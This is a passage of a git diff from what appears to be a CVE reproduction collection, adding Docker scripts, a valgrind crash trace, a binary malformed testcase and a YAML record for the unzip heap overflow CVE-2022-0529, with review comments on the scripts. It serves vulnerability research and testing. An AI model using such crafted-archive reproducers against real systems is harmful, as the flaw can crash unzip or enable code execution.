extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== + +valgrind: m_mallocfree.c:305 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 672, hi = 3689347702328406576. +This is probably caused by your program erroneously writing past the +end of a heap block and corrupting heap metadata. If you fix any +invalid writes reported by Memcheck, this assertion failure will +probably go away. Please try that before reporting this as a bug. + + +host stacktrace: +==1== at 0x58046FFA: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58047127: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x580472CB: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x580514B4: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803DE9A: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803CD9F: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58041F04: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803C1D8: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58017AF4: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x1002EC5614: ??? +==1== by 0x1002DB5F2F: ??? +==1== by 0x1002DB5F17: ??? +==1== by 0x1002DB5F2F: ??? +==1== by 0x1002DB5F3F: ??? 
+
+sched status:
+ running_tid=1
+
+Thread 1: status = VgTs_Runnable (lwpid 1)
+==1== at 0x4842A97: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
+==1== by 0x11E6FA: strcpy (string_fortified.h:90)
+==1== by 0x11E6FA: wide_to_local_string (process.c:2560)
+==1== by 0x11E800: utf8_to_local_string (process.c:2608)
+==1== by 0x117D50: do_string (fileio.c:2362)
+==1== by 0x114CA3: extract_or_test_files (extract.c:658)
+==1== by 0x11C830: do_seekable (process.c:994)
+==1== by 0x11D796: process_zipfiles (process.c:401)
+==1== by 0x10EB36: unzip (unzip.c:1278)
+==1== by 0x48890B2: (below main) (libc-start.c:308)
+client stack range: [0x1FFEFFE000 0x1FFF000FFF] client SP: 0x1FFF0008A8
+valgrind stack range: [0x1002CB6000 0x1002DB5FFF] top usage: 18248 of 1048576
diff --git a/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh b/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh
new file mode 100644
index 0000000000000000000000000000000000000000..cf70224311605a0a7f33cf8988b8fea9aeb7e3a7
--- /dev/null
+++ b/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+set -e
+
+IMAGE=unzip_bug_02-fedora
+docker build -t $IMAGE -f Dockerfile-fedora .
+
+echo "[+] Running unzip /testcase"
+docker run --rm -v $PWD/testcase:/testcase:ro \
+  -it $IMAGE valgrind unzip /testcase || true
+
+echo "[+] Dropping into shell. Malformed input is located at /testcase"
+docker run --rm -v $PWD/testcase:/testcase:ro \
+  -it $IMAGE bash
diff --git a/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh b/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh
new file mode 100644
index 0000000000000000000000000000000000000000..f125afb936635a3dfa96052b67749e3d7876e427
--- /dev/null
+++ b/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh
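Review bot: `docker run --rm -v $PWD/testcase:/testcase:ro` resolves the sample relative to the caller's working directory rather than the script's, and when `$PWD/testcase` does not exist Docker creates an empty host directory and mounts that, so `valgrind unzip /testcase` then fails for an unrelated reason that the trailing `|| true` hides. Anchoring on the script location and quoting the path fixes both: add `cd "$(dirname "$0")"` after `set -e` and use `-v "$PWD/testcase:/testcase:ro"` on both `docker run` lines. Since the reproduction needs no network, `--network none` on both runs is a cheap extra containment when feeding attacker-shaped input to the container.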
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+set -e
+
+IMAGE=unzip_bug_02-ubuntu
+docker build -t $IMAGE -f Dockerfile-ubuntu .
+
+echo "[+] Running unzip /testcase"
+docker run --rm -v $PWD/testcase:/testcase:ro \
+  -it $IMAGE valgrind unzip /testcase || true
+
+echo "[+] Dropping into shell. Malformed input is located at /testcase"
+docker run --rm -v $PWD/testcase:/testcase:ro \
+  -it $IMAGE bash
diff --git a/cve/unzip/2022/CVE-2022-0529/testcase b/cve/unzip/2022/CVE-2022-0529/testcase
new file mode 100644
index 0000000000000000000000000000000000000000..059d1d316d23f959d4c5ad525c505d4388802da5
Binary files /dev/null and b/cve/unzip/2022/CVE-2022-0529/testcase differ
diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..7838180fd3dfd2778f7151668565783599f8887d
--- /dev/null
+++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-0529
+source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529
+info:
+  name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。
+  severity: MEDIUM
+  description:
+    A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
+  scope-of-influence:
+    unzip Up to (excluding) 6.0-r11
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0529
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+    cvss-score: 5.5
+    cve-id: CVE-2022-0529
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
+    tags: CVE-2022, unzip
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 516c3adcfb636c223957496aa015901a0b61ef07..0dd1d2866bef928185fbfd8a7dcce61c1f5d4e1f 100644
--- a/other_list.yaml
+++ b/other_list.yaml
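Review bot: This script is the fedora one with two identifiers swapped, and it inherits the same weakness: `-v $PWD/testcase:/testcase:ro` depends on the caller's working directory and is unquoted, and a missing `testcase` becomes an empty directory mount whose failure `|| true` swallows. A single `reproduce.sh` taking the distro as its argument (`IMAGE=unzip_bug_02-$1`, `-f "Dockerfile-$1"`) with `cd "$(dirname "$0")"` after `set -e` would fix both copies at once and keep them from drifting. Consider `--network none` on the `docker run` lines as well, since nothing here needs network access.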
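Review bot: `scope-of-influence: unzip Up to (excluding) 6.0-r11` does not match the evidence in this commit: the README reproduces the crash on `unzip-6.0-53.fc35` and `6.0-25ubuntu1`, and `6.0-r11` reads like a downstream package revision rather than an upstream unzip version, so a reader cannot tell which builds are affected. Either cite where that bound comes from or state it as upstream unzip 6.0 with per-distribution fixed revisions. The `description` line says "crash or code execution" while the recorded vector is `C:N/I:N/A:H`; if the text is NVD's, a short comment that the score reflects availability impact only would keep the two from contradicting each other. The file also ends without a trailing newline.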
@@ -22,4 +22,6 @@ cve:
     - CVE-2021-1056
   java-spring-cloud-gateway:
     - CVE-2022-22947
+  unzip:
+    - CVE-2022-0529
 cnvd: